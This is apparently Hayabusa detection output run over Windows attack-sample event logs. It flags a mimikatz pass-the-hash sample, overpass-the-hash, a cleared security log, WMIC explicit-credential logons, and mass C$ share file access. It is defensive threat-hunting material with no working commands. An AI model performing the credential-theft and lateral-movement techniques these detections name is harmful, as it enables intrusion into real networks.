2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer:  | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
